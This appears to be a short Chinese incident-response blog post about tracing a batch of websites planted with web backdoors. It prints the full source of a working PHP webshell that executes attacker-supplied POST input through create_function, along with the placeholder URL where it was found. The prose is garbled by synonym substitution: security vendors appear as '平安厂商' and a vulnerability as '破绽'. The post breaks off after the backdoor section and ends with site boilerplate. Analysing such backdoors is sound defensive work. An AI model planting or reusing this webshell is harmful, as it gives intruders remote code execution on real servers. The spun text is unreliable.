1 背景

普通平安厂商都会有针对web后门的扫描工具，此次拿到了一批网站被植入后门的攻击线索，由于疫情缘由，现场排查取证条件比拟苛刻，所以此次溯源是在开局一个后门状况下展开，大致思绪是衔接后门->查看日志->破绽溯源。

2 后门排查

存在后门的URL : http://www.xxxx.com/plugins/layer/mobile/need/wwConapp.php

<?php
function fun2(){
    $b=$_POST;
    return @($b[a]);
}
@extract(array(b=>create_function(NULL,fun2())));
@extract(array(c=>$b()));
?>hello

感谢您的来访，获取更多精彩文章请收藏本站。